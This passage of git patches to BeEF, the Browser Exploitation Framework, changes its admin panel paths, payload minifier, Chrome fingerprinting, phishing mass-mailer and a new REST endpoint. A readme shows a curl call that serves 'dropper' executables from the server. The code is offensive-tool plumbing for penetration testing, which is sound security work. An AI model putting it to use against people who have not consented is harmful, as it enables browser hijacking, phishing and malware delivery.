 			}
 			
 			var form = new Ext.form.FormPanel({
-				url: '/ui/modules/commandmodule/reexecute',
+				url: '<%= @base_path %>/modules/commandmodule/reexecute',
 				id: 'form-command-module-zombie-'+zombie.session,
 				border: false,
 				labelWidth: 75,
@@ -208,7 +208,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 			});
 			
 			var grid_store = new Ext.data.JsonStore({
-				url: '/ui/modules/select/command_results.json?command_id='+command_id,
+				url: '<%= @base_path %>/modules/select/command_results.json?command_id='+command_id,
 				storeId: 'command-results-store-zombie-'+zombie.session,
 		        root: 'results',
 				remoteSort: false,
@@ -320,7 +320,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
 	} else {
 		Ext.Ajax.request({
 			loadMask: true,
-			url: '/ui/modules/select/commandmodule.json',
+			url: '<%= @base_path %>/modules/select/commandmodule.json',
 			method: 'POST',
 			params: 'command_module_id=' + command_module_id,
 			success: function(resp) {
@@ -331,9 +331,9 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
 					return;
 				}
 
-				var submiturl = '/ui/modules/commandmodule/new';
+				var submiturl = '<%= @base_path %>/modules/commandmodule/new';
 				if(module.dynamic){
-					submiturl = '/ui/modules/commandmodule/dynamicnew';
+					submiturl = '<%= @base_path %>/modules/commandmodule/dynamicnew';
 				}
 				
 				module = module.command_modules[1];
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
index 2257ee14e..1819b919c 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
@@ -248,7 +248,7 @@ ZombieTab_Autorun = function(zombie) {
                 }
          }})],
          loader: new Ext.tree.TreeLoader({
-                dataUrl: '/ui/modules/select/commandmodules/tree.json',
+                dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
                 baseParams: {zombie_session: zombie.session},
                 createNode: function(attr) {
                 if(attr.checked == null){attr.checked = false;}
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
index 3ae049d09..296c425b3 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
@@ -19,7 +19,7 @@ ZombieTab_Commands = function(zombie) {
 
 	var command_module_grid = new Ext.grid.GridPanel({
 		store: new Ext.data.JsonStore({
-				url: '/ui/modules/commandmodule/commands.json',
+				url: '<%= @base_path %>/modules/commandmodule/commands.json',
 				params: {  // insert the nonce with the form
 						nonce: Ext.get ("nonce").dom.value
 				},
@@ -107,7 +107,7 @@ ZombieTab_Commands = function(zombie) {
 		rootVisible: false,
 		root: {nodeType: 'async'},
 		loader: new Ext.tree.TreeLoader({
-          dataUrl: '/ui/modules/select/commandmodules/tree.json',
+          dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
           baseParams: {zombie_session: zombie.session},
           listeners:{
             beforeload: function(treeloader, node, callback) {
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
index 072fb143f..2da5a2335 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
@@ -10,7 +10,7 @@
 ZombieTab_DetailsTab = function(zombie) {
 	
 	var store_summary = new Ext.data.GroupingStore({
-			url: '/ui/modules/select/zombie_summary.json',
+			url: '<%= @base_path %>/modules/select/zombie_summary.json',
 			baseParams: {zombie_session: zombie.session} ,
 			reader: new Ext.data.JsonReader({
 					root: 'results'
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
index 8d39aaafe..b7a319158 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
@@ -9,7 +9,7 @@
  */
 ZombieTab_LogTab = function(zombie) {
 
-	var zombieLog = new DataGrid('/ui/logs/zombie.json',30,{session:zombie.session});
+	var zombieLog = new DataGrid('<%= @base_path %>/logs/zombie.json',30,{session:zombie.session});
 	zombieLog.border = false;
 
 	ZombieTab_LogTab.superclass.constructor.call(this, {
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
index 4973ae7e6..a17ed9c88 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
 		title: 'Proxy',
 		layout: 'fit',
 		padding: '10 10 10 10',
-                html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
+                html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
 		listeners: {
 			activate: function(proxy_panel) {
 				// to do: refresh list of hooked browsers
@@ -56,7 +56,7 @@ ZombieTab_Requester = function(zombie) {
 	 ********************************************/
 	var history_panel_store = new Ext.ux.data.PagingJsonStore({
 		storeId: 'requester-history-store-zombie-'+zombie.session,
-		url: '/ui/requester/history.json',
+		url: '<%= @base_path %>/requester/history.json',
 		remoteSort: false,
 		autoDestroy: true,
 		autoLoad: false,
@@ -169,7 +169,7 @@ ZombieTab_Requester = function(zombie) {
 		
 		listeners: {
 			activate: function(history_panel) {
-				history_panel.items.items[0].store.reload({params:{url:'/ui/requester/history.json'}});
+				history_panel.items.items[0].store.reload({params:{url:'<%= @base_path %>/requester/history.json'}});
 			}
 		}
 	});
@@ -190,7 +190,7 @@ ZombieTab_Requester = function(zombie) {
 		var form = new Ext.FormPanel({
 			title: 'Forge Raw HTTP Request',
 			id: 'requester-request-form-zombie'+zombie.session,
-			url: '/ui/requester/send',
+			url: '<%= @base_path %>/requester/send',
 			hideLabels : true,
 			border: false,
 			padding: '3px 5px 0 5px',
@@ -251,7 +251,7 @@ ZombieTab_Requester = function(zombie) {
 		bar.update_sending('Getting response...');
 		
 		Ext.Ajax.request({
-			url: '/ui/requester/response.json',
+			url: '<%= @base_path %>/requester/response.json',
 			loadMask: true,
 			
 			params: {
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
index 882aea26b..1cf5dbd1d 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
@@ -23,7 +23,7 @@ ZombieTab_XssRaysTab = function(zombie) {
 
      var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({
         storeId: 'xssrays-logs-store-zombie-' + zombie.session,
-        url: '/ui/xssrays/zombie.json',
+        url: '/<%= @base_path %>/xssrays/zombie.json',
         remoteSort: false,
         autoDestroy: true,
         autoLoad: false,
@@ -94,7 +94,7 @@ ZombieTab_XssRaysTab = function(zombie) {
 		var form = new Ext.FormPanel({
 			title: 'Scan settings',
 			id: 'xssrays-config-form-zombie'+zombie.session,
-			url: '/ui/xssrays/createNewScan',
+			url: '<%= @base_path %>/xssrays/createNewScan',
             labelWidth: 230,
 			border: false,
 			padding: '3px 5px 0 5px',
diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
index d499d9a78..cd589f11f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
@@ -85,14 +85,14 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
                   switch (item.id) {
                       case 'use_as_proxy':
                            Ext.Ajax.request({
-                                url: '/ui/proxy/setTargetZombie',
+                                url: '<%= @base_path %>/proxy/setTargetZombie',
                                 method: 'POST',
                                 params: 'hb_id=' + escape(hb_id)
                             });
                           break;
                        case 'xssrays_hooked_domain':
                            Ext.Ajax.request({
-                                url: '/ui/xssrays/set_scan_target',
+                                url: '<%= @base_path %>/xssrays/set_scan_target',
                                 method: 'POST',
                                 params: 'hb_id=' + escape(hb_id)
                             });
diff --git a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
index 3818da8b1..81986d5ad 100644
--- a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
+++ b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
@@ -422,3 +422,6 @@
   };
 
 })( jQuery );
+
+
+var $jwterm = jQuery.noConflict();
\ No newline at end of file
diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html
index 58e3e103d..180cc3517 100644
--- a/extensions/demos/html/basic.html
+++ b/extensions/demos/html/basic.html
@@ -19,7 +19,6 @@
 		Have fun while your browser is working against you.
 	</p>
 		
-	<p>
 		These links are for demonstrating the "Get Page HREFs" command module<br />
 	<ul>
 	
@@ -28,7 +27,6 @@
 	<li><a href="http://slashdot.org/" target="_blank">Slashdot</a>
 
 	</ul>
-	</p>
 
     <p>Have a go at the event logger.<br />
     <label for="imptxt">Insert your secret here:</label>&nbsp;&nbsp;<input type="text" id="imptxt" name="Important Text" /></p>
diff --git a/extensions/evasion/obfuscation/minify.rb b/extensions/evasion/obfuscation/minify.rb
index 054f60efc..05b97ed22 100644
--- a/extensions/evasion/obfuscation/minify.rb
+++ b/extensions/evasion/obfuscation/minify.rb
@@ -6,7 +6,7 @@
 module BeEF
   module Extension
     module Evasion
-      require 'jsmin'
+      require 'uglifier'
       class Minify
         include Singleton
 
@@ -15,7 +15,7 @@ module BeEF
         end
 
         def execute(input, config)
-          input = JSMin.minify(input)
+          input = Uglifier.compile(input)
           print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified"
           input
         end

From 8d44b48768949d6d4fa1139f28b1adb5d6e3666e Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Oct 2013 14:24:22 +0100
Subject: [PATCH 376/397] Added dependency to therubyracer (V8 implementation
 for Ruby) if the OS is not OSX.

---
 Gemfile | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/Gemfile b/Gemfile
index 3a505922b..1a748023a 100644
--- a/Gemfile
+++ b/Gemfile
@@ -16,8 +16,11 @@ gem "thin"
 gem "sinatra", "1.4.2"
 gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
-gem "jsmin", "~> 1.0.1"
 gem "uglifier", "~> 2.2.1"
+# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
+if !RUBY_PLATFORM.downcase.include?("darwin")
+  gem "therubyracer", "~> 0.12.0"
+end
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"

From 2f51deb88a634acf94ee19dfd6274eb87660f263 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 Oct 2013 14:53:04 +0100
Subject: [PATCH 377/397] Fixed issue with Social Engineering extension when
 using an SMTP server without any needed authentication.

---
 extensions/social_engineering/mass_mailer/mass_mailer.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index 3ab99ad17..40f6083b9 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -56,7 +56,7 @@ module BeEF
               end
             end
           else
-            smtp.start(@helo, @auth) do |smtp|
+            smtp.start(@helo) do |smtp|
               tos_hash.each do |to, name|
                 message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
                 smtp.send_message(message, fromaddr, to)

From 8033b77b73e2444b539fae64e1a15fcd84f80280 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sun, 6 Oct 2013 17:20:01 +0800
Subject: [PATCH 378/397] Support for Chrome version 30 in browser detection

---
 core/main/client/browser.js | 28 +++++++++++++++++++++++++++-
 1 file changed, 27 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index b783619a5..69ad44975 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -612,12 +612,28 @@ beef.browser = {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome 30.
+     * @example: beef.browser.isC30()
+     */
+    isC30:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 30.
+     * @example: beef.browser.isC30iOS()
+     */
+    isC30iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS();
     },
 
     /**
@@ -713,6 +729,8 @@ beef.browser = {
             C28iOS:this.isC28iOS(), // Chrome 28 on iOS
             C29:this.isC29(), // Chrome 29
             C29iOS:this.isC29iOS(), // Chrome 29 on iOS
+            C30:this.isC30(), // Chrome 30 
+            C30iOS:this.isC30iOS(), // Chrome 30 on iOS
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -915,6 +933,14 @@ beef.browser = {
             return '29'
         }
         ;   // Chrome 29 for iOS
+        if (this.isC30()) {
+            return '30'
+        }
+        ;    // Chrome 30
+        if (this.isC30iOS()) {
+            return '30'
+        }
+        ;   // Chrome 30 for iOS
         if (this.isFF2()) {
             return '2'
         }

From 638e037e56e1e36659d949116c3486bbad5d2f8a Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 6 Oct 2013 19:17:55 +1030
Subject: [PATCH 379/397] Remove Java and VLC detection from hook init

---
 core/main/client/browser.js                      |  4 ----
 core/main/handlers/browserdetails.rb             | 16 ----------------
 extensions/admin_ui/controllers/panel/panel.rb   |  4 ----
 .../media/javascript/ui/panel/ZombiesMgr.js      |  4 ----
 4 files changed, 28 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 69ad44975..10c5c7f51 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1731,7 +1731,6 @@ beef.browser = {
         });
         var screen_size      = beef.browser.getScreenSize();
         var window_size      = beef.browser.getWindowSize();
-        var java_enabled     = (beef.browser.javaEnabled()) ?     "Yes" : "No";
         var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
         var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
         var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
@@ -1743,7 +1742,6 @@ beef.browser = {
         var has_quicktime    = (beef.browser.hasQuickTime()) ?    "Yes" : "No";
         var has_realplayer   = (beef.browser.hasRealPlayer()) ?   "Yes" : "No";
         var has_wmp          = (beef.browser.hasWMP()) ?          "Yes" : "No"; 
-        var has_vlc          = (beef.browser.hasVLC()) ?          "Yes" : "No";
         var has_foxit        = (beef.browser.hasFoxit()) ?        "Yes" : "No";
         try{
             var cookies = document.cookie;
@@ -1778,7 +1776,6 @@ beef.browser = {
         if (browser_type) details['BrowserType'] = browser_type;
         if (screen_size) details['ScreenSize'] = screen_size;
         if (window_size) details['WindowSize'] = window_size;
-        if (java_enabled) details['JavaEnabled'] = java_enabled;
         if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
         if (has_flash) details['HasFlash'] = has_flash;
         if (has_phonegap) details['HasPhonegap'] = has_phonegap;
@@ -1790,7 +1787,6 @@ beef.browser = {
         if (has_quicktime) details['HasQuickTime'] = has_quicktime;
         if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
         if (has_wmp) details['HasWMP'] = has_wmp;
-        if (has_vlc) details['HasVLC'] = has_vlc;
         if (has_foxit) details['HasFoxit'] = has_foxit;
 
         return details;
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 7f851c923..0e65168b0 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -250,14 +250,6 @@ module BeEF
             self.err_msg "Invalid window size returned from the hook browser's initial connection."
           end
 
-          # get and store the yes|no value for JavaEnabled
-          java_enabled = get_param(@data['results'], 'JavaEnabled')
-          if BeEF::Filters.is_valid_yes_no?(java_enabled)
-            BD.set(session_id, 'JavaEnabled', java_enabled)
-          else
-            self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
-          end
-
           # get and store the yes|no value for VBScriptEnabled
           vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
           if  BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -354,14 +346,6 @@ module BeEF
             self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
           end
 
-          # get and store the yes|no value for HasVLC
-          has_vlc = get_param(@data['results'], 'HasVLC')
-          if BeEF::Filters.is_valid_yes_no?(has_vlc)
-            BD.set(session_id, 'HasVLC', has_vlc)
-          else
-            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
-          end
-
           # get and store the value for CPU
           cpu_type = get_param(@data['results'], 'CPU')
           if !cpu_type.nil?
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 255deef34..ecc51755f 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -87,14 +87,12 @@ module BeEF
             has_flash       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
-            has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
             has_webrtc      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
             has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
             has_wmp         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP') 
-            has_vlc         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
             has_foxit       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
@@ -113,13 +111,11 @@ module BeEF
                 'has_flash'       => has_flash,
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
-                'has_java'        => has_java,
                 'has_webrtc'      => has_webrtc,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,
                 'has_wmp'         => has_wmp,
-                'has_vlc'         => has_vlc,
                 'has_foxit'       => has_foxit,
                 'has_realplayer'  => has_realplayer,
                 'date_stamp'      => date_stamp
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 02c2a4106..c05c42fe9 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -26,11 +26,9 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_flash          = zombie_array[index]["has_flash"];
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
-		var has_java           = zombie_array[index]["has_java"];
 		var has_webrtc         = zombie_array[index]["has_webrtc"];
 		var has_activex        = zombie_array[index]["has_activex"];
 		var has_wmp            = zombie_array[index]["has_wmp"]; 
-		var has_vlc            = zombie_array[index]["has_vlc"];
 		var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
@@ -48,14 +46,12 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-		balloon_text+= "<br/>Java: "           + has_java;
 		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
 		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
 		balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
-		balloon_text+= "<br/>VLC: "            + has_vlc;
 		balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;

From 71a67defd48a2da48ebc3048b6172d26bbf58014 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 8 Oct 2013 14:08:52 +0100
Subject: [PATCH 380/397] Added new RESTful API method to bind a local file to
 a url. Also added "dropper" directory into Social Engineering extension.

---
 core/bootstrap.rb                             |  1 +
 core/main/rest/api.rb                         |  7 ++++
 core/main/rest/handlers/server.rb             | 41 +++++++++++++++++++
 .../social_engineering/droppers/readme.txt    |  9 ++++
 4 files changed, 58 insertions(+)
 create mode 100644 core/main/rest/handlers/server.rb
 create mode 100644 extensions/social_engineering/droppers/readme.txt

diff --git a/core/bootstrap.rb b/core/bootstrap.rb
index 71dcfb88c..372ce86d9 100644
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -45,6 +45,7 @@ require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
+require 'core/main/rest/handlers/server'
 require 'core/main/rest/api'
 
 ## @note Include Websocket
diff --git a/core/main/rest/api.rb b/core/main/rest/api.rb
index 12a26614c..109aa4ff5 100644
--- a/core/main/rest/api.rb
+++ b/core/main/rest/api.rb
@@ -37,12 +37,19 @@ module BeEF
         end
       end
 
+      module RegisterServerHandler
+        def self.mount_handler(server)
+          server.mount('/api/server', BeEF::Core::Rest::Server.new)
+        end
+      end
+
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
 
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
 
       #
       # Check the source IP is within the permitted subnet
diff --git a/core/main/rest/handlers/server.rb b/core/main/rest/handlers/server.rb
new file mode 100644
index 000000000..361359acf
--- /dev/null
+++ b/core/main/rest/handlers/server.rb
@@ -0,0 +1,41 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Server < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+        http_server = BeEF::Core::Server.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+
+        # @note Binds a local file to a specified path in BeEF's web server
+        post '/bind' do
+          request.body.rewind
+          begin
+            data = JSON.parse request.body.read
+            mount = data['mount']
+            local_file = data['local_file']
+            BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
+            status 200
+          rescue Exception => e
+            error 400
+          end
+        end
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/extensions/social_engineering/droppers/readme.txt b/extensions/social_engineering/droppers/readme.txt
new file mode 100644
index 000000000..320ba710f
--- /dev/null
+++ b/extensions/social_engineering/droppers/readme.txt
@@ -0,0 +1,9 @@
+This directory will contain the droppers (executables, JARs, browser extensions, etc..)
+that you want to have available on the BeEF server.
+
+For example, if you want to have bin.exe available at http://beefserver/bin.exe,
+use the following RESTful API call:
+
+curl -H "Content-Type: application/json; charset=UTF-8" -d
+'{"mount":"/bin.exe", "local_file":"/extensions/social_engineering/droppers/bin.exe"}'
+ -X POST http://beefserver/api/server/bind?token=<token>
\ No newline at end of file

From 2c750670d766ca32ba09d19f35350b5c63e9eb10 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 8 Oct 2013 15:21:54 +0100
Subject: [PATCH 381/397] fixed doctype error in basic.html (IE only)

---
 extensions/demos/html/basic.html | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html
index 180cc3517..49aea113a 100644
--- a/extensions/demos/html/basic.html
+++ b/extensions/demos/html/basic.html
@@ -1,10 +1,10 @@
